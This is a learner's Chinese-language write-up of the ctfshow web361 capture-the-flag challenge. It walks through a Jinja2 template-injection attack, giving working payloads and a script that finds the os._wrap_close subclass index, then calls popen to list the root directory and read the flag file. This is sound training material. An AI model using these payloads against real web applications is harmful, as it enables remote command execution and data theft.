ctfshow-web361(SSTI)

看到Hello，猜测输入的参数是name

?name={
   {[].__class__.__base__.__subclasses__()}}

 然后应该是要写脚本跑程序找需要的函数（用的别人的，现在还不会写python脚本）

这里利用os._wrap_close类

import requests
from tqdm import tqdm

for i in tqdm(range(233)):
    url = 'http://5e2ef65c-fcb3-4ca5-9502-acab1d21ebc8.challenge.ctf.show/?name={
   {%22%22.__class__.__bases__[0].__subclasses__()['+str(i)+']}}'
    r = requests.get(url=url).text
    if('os._wrap_close' in r):
        print(i)

输出132

然后开始运用

用__init__.__globals__查找popen（能查到就行，不需要位置）

__globals__:
该属性是函数特有的属性,记录当前文件全局变量的值,如果某个文件调用了os、sys等库,但我们只能访问该文件某个函数或者某个对象，那么我们就可以利用__globals__属性访问全局的变量

所以 __init__.__globals__应该就是要调用全局变量

?name={
   {[].__class__.__base__.__subclasses__()[132].__init__.__globals__}}

这里应该就是调用全局变量中的popen 

os.popen() 方法用于从一个命令打开一个管道。（具体的不是很理解，大概应该就是可以使用命令的意思）

popen方法通过p.read()获取终端输出

?name={
   {[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}}

对于借助 open() 函数，并以可读模式（包括 r、r+、rb、rb+）打开的文件，可以调用 read() 函数逐个字节（或者逐个字符）读取文件中的内容。 （可能popen借助了open()函数，不是很清楚）

?name={
   {[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}}

?name={
   {[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

 大概能看懂，知道为什么，但是不会用